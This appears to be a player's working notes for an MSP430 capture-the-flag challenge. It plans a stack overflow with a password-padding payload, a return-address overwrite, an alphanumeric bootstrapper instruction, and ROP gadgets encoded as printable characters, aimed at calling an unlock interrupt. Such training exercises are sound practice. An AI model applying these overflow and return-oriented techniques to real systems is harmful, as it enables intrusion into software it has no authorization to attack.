; Goal: execute code from 0x25b6

; stack buffer: 43ed
; mem buffer: 2400

passwordpassword1[retval][pcoffset]0[realfunc][padding]0[bootstrapper]

retval = 0x4430 ; &bootstrapper
pcoffset = 0x2443-0x4430 ; &realfunc - retval
padding = "A"*0x30 + "1" ; alignment
bootstrapper = subc @sp+, pc ; 3071


'passwordpassword1' + 'D0' + '??' + '0' + [realfunc][padding]0[bootstrapper]

bootstrapper:
add @sp+, r15

realfunc:
push #0x7f
call 45fc

3012 7e00 b012 fc45

; Step 1: Create a bootstrapper out of alphanumeric characters, and store it on the stack
; this instruction pops a value off the stack and subtracts it from pc. Perfect for
subc @sp+, pc

b'passwordpassword1'+(b'\x30\x71'*0x1a4)+b'00000000000000'

code snippets:
; pop to register
3n413041 ; nA0A
pop Rn
ret

; popadd to register
add @sp+, rN ; nq0A
ret

32413041 ; 2A0A
pop sr
ret


ROP gadgets:

Pop sr


Move byte relative to R4 into r15
4464 ("Dd"):
mov.b -0x4(r4), r15
sxt r15
add #0x8, sp
pop r4
ret

Pop r4:
446c ("Dl")
pop r4
ret



passwordpassword1DlDd